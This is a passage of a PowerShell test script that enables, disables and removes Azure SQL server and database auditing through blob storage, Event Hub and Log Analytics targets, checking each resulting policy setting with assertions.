{$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::APPLICATION_ROLE_CHANGE_PASSWORD_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_OBJECT_PERMISSION_CHANGE_GROUP)} Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "DATABASE_OPERATION_GROUP","DATABASE_LOGOUT_GROUP" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_OPERATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_LOGOUT_GROUP)} Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_OPERATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_LOGOUT_GROUP)} } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-ExtendedAuditOnServer { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "" $policy.PredicateExpression Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 -PredicateExpression "statement <> 'select 1'" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "statement <> 'select 1'" $policy.PredicateExpression Set-AzSqlServerAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "statement <> 'select 1'" $policy.PredicateExpression Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 -PredicateExpression "" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "" $policy.PredicateExpression Set-AzSqlServerAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-ExtendedAuditOnDatabase { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "" $policy.PredicateExpression Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 -PredicateExpression "statement <> 'select 1'" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "statement <> 'select 1'" $policy.PredicateExpression Set-AzSqlDatabaseAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "statement <> 'select 1'" $policy.PredicateExpression Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 -PredicateExpression "" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual "" $policy.PredicateExpression Set-AzSqlDatabaseAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-AuditOnDatabase { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/" + $params.databaseName try { Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count $policy = Get-AzSqlDatabase -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName | Get-AzSqlDatabaseAudit Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-Null $policy.PredicateExpression Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Get-AzSqlDatabase -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName | Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -LogAnalyticsTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -WorkspaceResourceId $workspaceResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -LogAnalyticsTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.WorkspaceResourceId Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -EventHubTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-RemoveAuditOnDatabase { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/" + $params.databaseName try { Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count $policy = Get-AzSqlDatabase -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName | Get-AzSqlDatabaseAudit Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-Null $policy.PredicateExpression Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Get-AzSqlDatabase -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName | Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlDatabaseAudit -LogAnalyticsTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -WorkspaceResourceId $workspaceResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-AuditOnServer { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/master" try { Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count $policy = Get-AzSqlServer -ResourceGroupName $params.rgname -ServerName $params.serverName | Get-AzSqlServerAudit Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null 